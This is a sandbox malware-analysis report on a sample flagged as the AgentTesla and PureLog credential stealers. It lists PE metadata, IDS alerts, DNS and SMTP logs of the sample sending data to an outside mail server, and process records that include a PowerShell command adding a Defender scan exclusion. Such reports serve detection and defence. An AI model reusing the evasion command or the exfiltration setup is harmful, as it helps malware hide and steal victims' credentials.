OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa3214	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa4000	0x2800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa1274	0xa1400	7b5f42db24c3d6ad76bd287088d2eee6	False	0.9430732194767442	data	7.913866005602331	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa4000	0x2800	0x2800	b06b41b770fbe82b967fce50d72c19fb	False	0.8794921875	data	7.615675131035001	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa8000	0xc	0x200	3087c54681c88823bbda91a44ac83d34	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa40c8	0x2356	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9427371213796153
RT_GROUP_ICON	0xa6430	0x14	data	1.05
RT_VERSION	0xa6454	0x378	data	0.39414414414414417

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T12:40:55.696232+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.7	49702	199.79.62.115	587	TCP
2025-01-09T12:40:55.696232+0100	2839723	ETPRO MALWARE Win32/Agent Tesla SMTP Activity	1	192.168.2.7	49702	199.79.62.115	587	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 12:41:07.685302019 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:07.690221071 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:07.690291882 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:08.268894911 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:08.273020029 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:08.277852058 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:08.419831038 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:08.444672108 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:08.449589968 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:08.592653036 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:08.598172903 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:08.603023052 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:08.930818081 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:08.931046009 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:08.935841084 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.097039938 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.097232103 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:09.102072954 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.265774965 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.265937090 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:09.271439075 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.425019979 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.425796986 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:09.425951958 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:09.425993919 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:09.426009893 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:09.430716038 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.430747986 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.430792093 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.430802107 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.668251991 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:41:09.711940050 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:41:21.297350883 CET	49588	53	192.168.2.7	1.1.1.1
Jan 9, 2025 12:41:21.302167892 CET	53	49588	1.1.1.1	192.168.2.7
Jan 9, 2025 12:41:21.302251101 CET	49588	53	192.168.2.7	1.1.1.1
Jan 9, 2025 12:41:21.307132959 CET	53	49588	1.1.1.1	192.168.2.7
Jan 9, 2025 12:41:21.751136065 CET	49588	53	192.168.2.7	1.1.1.1
Jan 9, 2025 12:41:21.756191969 CET	53	49588	1.1.1.1	192.168.2.7
Jan 9, 2025 12:41:21.756519079 CET	49588	53	192.168.2.7	1.1.1.1
Jan 9, 2025 12:42:45.540852070 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:42:45.545887947 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:42:45.889086962 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:42:45.889121056 CET	587	49702	199.79.62.115	192.168.2.7
Jan 9, 2025 12:42:45.889225006 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:42:45.889429092 CET	49702	587	192.168.2.7	199.79.62.115
Jan 9, 2025 12:42:45.894236088 CET	587	49702	199.79.62.115	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 12:41:05.526542902 CET	57257	53	192.168.2.7	1.1.1.1
Jan 9, 2025 12:41:06.525343895 CET	57257	53	192.168.2.7	1.1.1.1
Jan 9, 2025 12:41:07.524633884 CET	57257	53	192.168.2.7	1.1.1.1
Jan 9, 2025 12:41:07.677227974 CET	53	57257	1.1.1.1	192.168.2.7
Jan 9, 2025 12:41:07.677246094 CET	53	57257	1.1.1.1	192.168.2.7
Jan 9, 2025 12:41:07.677256107 CET	53	57257	1.1.1.1	192.168.2.7
Jan 9, 2025 12:41:21.296953917 CET	53	58160	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 12:41:05.526542902 CET	192.168.2.7	1.1.1.1	0xc7d1	Standard query (0)	mail.mbarieservicesltd.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 12:41:06.525343895 CET	192.168.2.7	1.1.1.1	0xc7d1	Standard query (0)	mail.mbarieservicesltd.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 12:41:07.524633884 CET	192.168.2.7	1.1.1.1	0xc7d1	Standard query (0)	mail.mbarieservicesltd.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 12:41:07.677227974 CET	1.1.1.1	192.168.2.7	0xc7d1	No error (0)	mail.mbarieservicesltd.com	199.79.62.115	A (IP address)	IN (0x0001)	false
Jan 9, 2025 12:41:07.677246094 CET	1.1.1.1	192.168.2.7	0xc7d1	No error (0)	mail.mbarieservicesltd.com	199.79.62.115	A (IP address)	IN (0x0001)	false
Jan 9, 2025 12:41:07.677256107 CET	1.1.1.1	192.168.2.7	0xc7d1	No error (0)	mail.mbarieservicesltd.com	199.79.62.115	A (IP address)	IN (0x0001)	false

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 9, 2025 12:41:08.268894911 CET	587	49702	199.79.62.115	192.168.2.7	220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 09 Jan 2025 17:11:08 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 9, 2025 12:41:08.273020029 CET	49702	587	192.168.2.7	199.79.62.115	EHLO 965543
Jan 9, 2025 12:41:08.419831038 CET	587	49702	199.79.62.115	192.168.2.7	250-md-54.webhostbox.net Hello 965543 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 9, 2025 12:41:08.444672108 CET	49702	587	192.168.2.7	199.79.62.115	AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
Jan 9, 2025 12:41:08.592653036 CET	587	49702	199.79.62.115	192.168.2.7	334 UGFzc3dvcmQ6
Jan 9, 2025 12:41:08.930818081 CET	587	49702	199.79.62.115	192.168.2.7	235 Authentication succeeded
Jan 9, 2025 12:41:08.931046009 CET	49702	587	192.168.2.7	199.79.62.115	MAIL FROM:<saless@mbarieservicesltd.com>
Jan 9, 2025 12:41:09.097039938 CET	587	49702	199.79.62.115	192.168.2.7	250 OK
Jan 9, 2025 12:41:09.097232103 CET	49702	587	192.168.2.7	199.79.62.115	RCPT TO:<iinfo@mbarieservicesltd.com>
Jan 9, 2025 12:41:09.265774965 CET	587	49702	199.79.62.115	192.168.2.7	250 Accepted
Jan 9, 2025 12:41:09.265937090 CET	49702	587	192.168.2.7	199.79.62.115	DATA
Jan 9, 2025 12:41:09.425019979 CET	587	49702	199.79.62.115	192.168.2.7	354 Enter message, ending with "." on a line by itself
Jan 9, 2025 12:41:09.426009893 CET	49702	587	192.168.2.7	199.79.62.115	.
Jan 9, 2025 12:41:09.668251991 CET	587	49702	199.79.62.115	192.168.2.7	250 OK id=1tVquT-001OoL-15
Jan 9, 2025 12:42:45.540852070 CET	49702	587	192.168.2.7	199.79.62.115	QUIT
Jan 9, 2025 12:42:45.889086962 CET	587	49702	199.79.62.115	192.168.2.7	221 md-54.webhostbox.net closing connection

Target ID:	0
Start time:	06:41:00
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\PO23100076.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO23100076.exe"
Imagebase:	0x1c0000
File size:	671'744 bytes
MD5 hash:	ABEF12C0EC6C52759F2CD9CC5402E593
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:41:02
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"
Imagebase:	0x8b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:41:02
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:41:02
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\PO23100076.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO23100076.exe"
Imagebase:	0x130000
File size:	671'744 bytes
MD5 hash:	ABEF12C0EC6C52759F2CD9CC5402E593
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:41:02
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\PO23100076.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PO23100076.exe"
Imagebase:	0x190000
File size:	671'744 bytes
MD5 hash:	ABEF12C0EC6C52759F2CD9CC5402E593
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:41:02
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\PO23100076.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO23100076.exe"
Imagebase:	0xcd0000
File size:	671'744 bytes
MD5 hash:	ABEF12C0EC6C52759F2CD9CC5402E593
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:41:04
Start date:	09/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.3%
Total number of Nodes:	238
Total number of Limit Nodes:	14

Executed Functions

Function 06828740 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pq, xrefs: 0682940E
TJq, xrefs: 068288E6
\ lw, xrefs: 06828B49
xbq, xrefs: 06828870
Teq, xrefs: 06828F97
4'q, xrefs: 06829337

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID: 4'q$TJq$Teq$\ lw$pq$xbq
API String ID: 0-2278883514
Opcode ID: 6072df8d50169fe3fe572f62384826a36953412cf80640050c742100cdc43a9a
Instruction ID: fc9bffe0292147990e80bf551eb0aa1f5f61e29d39412935114314895926c78e
Opcode Fuzzy Hash: 6072df8d50169fe3fe572f62384826a36953412cf80640050c742100cdc43a9a
Instruction Fuzzy Hash: 24B2CE74E00629CFDB64CF69C984ADDBBB2BF89304F1581E9D509AB265DB319E81CF40

Function 068203B8 Relevance: 6.9, Strings: 5, Instructions: 605
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 06822263
Hq, xrefs: 068221A5
Hq, xrefs: 06822001
Hq, xrefs: 0682211B
Hq, xrefs: 06822094

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq$Hq$Hq
API String ID: 0-3799487529
Opcode ID: be3307563507acbe27794b8efe129a6f01ed1f01f6148cf206d4f0fe26bcff18
Instruction ID: e6c538febb3d3e38579f7f002d1fa5c538116dc82e21dd17725d3068f7070608
Opcode Fuzzy Hash: be3307563507acbe27794b8efe129a6f01ed1f01f6148cf206d4f0fe26bcff18
Instruction Fuzzy Hash: F9329030E002198FDB58DF68C85579EBBF2BF88300F248469D54AEB395DB349D85CB95

Function 06828730 Relevance: 4.0, Strings: 3, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJq, xrefs: 068288E6
xbq, xrefs: 06828870
Teq, xrefs: 06828F97

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID: TJq$Teq$xbq
API String ID: 0-4091408781
Opcode ID: 326ffa9032b389afccf40f11c0cb6e707225da276ed691585f4d809a8ff067d7
Instruction ID: 22c10c681b4e3ab9edae7dc9ac9bd97e7d4d8ffc64e6c5df8b1aaf60e4783738
Opcode Fuzzy Hash: 326ffa9032b389afccf40f11c0cb6e707225da276ed691585f4d809a8ff067d7
Instruction Fuzzy Hash: 13C17475E016688FDB68CF6AD944ADDBBF2BF88300F14C1A9D509AB364DB305A85CF50

Function 068203B5 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7096dbda80a1937ab1359970f3b0cc8158f5545cff49dd209fe59502dd9e8f7
Instruction ID: 15a388a33f0f8467963d10a249ee93fd76d87911caa2a0bc5cb6c99a24ef0bba
Opcode Fuzzy Hash: d7096dbda80a1937ab1359970f3b0cc8158f5545cff49dd209fe59502dd9e8f7
Instruction Fuzzy Hash: FFC17D31E002298FDB54DF69C88479EBBB2BF88300F14C5AAD959EB255DB30E984CF51

Function 06821A3A Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b73c990851ad38623f7fa839dd3cc9b82c2d81cb15603464028b0ec78f63c9ed
Instruction ID: 714eec7162f991e1f373d991c787801b63975fdaa155820d0ba5295ad982c95f
Opcode Fuzzy Hash: b73c990851ad38623f7fa839dd3cc9b82c2d81cb15603464028b0ec78f63c9ed
Instruction Fuzzy Hash: 6CC16D31E002298FDB54DF69C88479EBBB2BF88300F14C5A9D959EB255DB30A985CF51

Function 04AE397C Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 531e9b692ac95d716d56c72aa4f044670809d4efecdbd0ca0655c8a920769531
Instruction ID: 9761780d730728b4ed8dbb19d64a91496a7ca637b21e31af7a8fc14be1ec2e5b
Opcode Fuzzy Hash: 531e9b692ac95d716d56c72aa4f044670809d4efecdbd0ca0655c8a920769531
Instruction Fuzzy Hash: A8A1BF74E103199FCB04DFA5D894AEDBBBAFF89300F558615E425AF264DB30E942CB90

Function 04AE4510 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36fb58f5a483b7e565a13b191338d5963825dffe79b586fc531c5a734f32fe7d
Instruction ID: 9ccaa757a7b28edf81018fbc734db6f4bd9316b2b3af4d1c456513e99174f934
Opcode Fuzzy Hash: 36fb58f5a483b7e565a13b191338d5963825dffe79b586fc531c5a734f32fe7d
Instruction Fuzzy Hash: D191CF75E103099FCB05DFA5D844AEDBBBAFF99300F558215E415AF264EB30E941CB90

Function 04AE44F1 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1275851820.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ae0000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc503195803115c6e6eb469998b0a233d9f9b82cc5f11dd6aa8e39142d9f9bc
Instruction ID: b2987a193b2495ed0e37660a6005465365615350fac9ba58ad88a6cd5fa34852
Opcode Fuzzy Hash: fdc503195803115c6e6eb469998b0a233d9f9b82cc5f11dd6aa8e39142d9f9bc
Instruction Fuzzy Hash: 5981BD75E103099FCB01DFA1D844AEDBBBAFF99300F558255E425AF2A4EB30E981CB50

Function 0682B818 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65685ee013ab157b0596b5c422d47bd777abd770facc9b8b519bd3b1c3feacd3
Instruction ID: c58d3087dd8699452034c66aa452051eb144f0dc5d0eedefc9022b85a86d059b
Opcode Fuzzy Hash: 65685ee013ab157b0596b5c422d47bd777abd770facc9b8b519bd3b1c3feacd3
Instruction Fuzzy Hash: B221F8B1D056599FEB28CFAAC84179EFBF2BFC9304F14C06AC458A7255EB340A468F50

Function 06F00028 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2db27f822b65ee2494441ec0aaa67d750407409dcf16f4021e8d2988e43c8f
Instruction ID: 8f432fbaf36124dfb08c4cfa771a7a0d56cdcf9ebd9f47cfe8ca4f30815f3558
Opcode Fuzzy Hash: 3c2db27f822b65ee2494441ec0aaa67d750407409dcf16f4021e8d2988e43c8f
Instruction Fuzzy Hash: 4321F8B1D046589FEB19CF66C8143DEBFF6AFC9300F08C06AC409AA2A5DB740945CF50

Function 0682B828 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eafd19f35527583a0e67acdcf72d0eb4c276b50cd759216c79ad858c25e3d97
Instruction ID: e21510afd7bf00bfcdce4fb13576d181b203bcc449c9036450e032c7b60ff7b9
Opcode Fuzzy Hash: 9eafd19f35527583a0e67acdcf72d0eb4c276b50cd759216c79ad858c25e3d97
Instruction Fuzzy Hash: B621E971D056299BEB68CFABC84169EFBF7BFC8304F14D06AC419A7254EB341A468F50

Function 06F00040 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea5b26d667e726ee5f4edf9437dbba0f780033b1af38abab5e1d7132265f5ac9
Instruction ID: 58353362da9102a99528fe12b9c10262e797021efb7ddedbe4935a73cd9c792a
Opcode Fuzzy Hash: ea5b26d667e726ee5f4edf9437dbba0f780033b1af38abab5e1d7132265f5ac9
Instruction Fuzzy Hash: 7621B2B1D046189BEB18CFABC8547EEFAB6BFC8300F04C06AD509A62A4DB740945CF94

Function 06F05EB8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F060EE

Memory Dump Source

Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: eb746e1e4c78239a92a8f307b14b55a640236f3078e7e82f48bd33f80fac78b2
Instruction ID: d29ef060ef2c6a5a2a3d9588678b21fd17ebb7b377a6ff47d326e1601c01cfc4
Opcode Fuzzy Hash: eb746e1e4c78239a92a8f307b14b55a640236f3078e7e82f48bd33f80fac78b2
Instruction Fuzzy Hash: E6918A71D003198FEB60CFA8C841BEDBBB2BF48314F1485A9E809E7280DB759995DF91

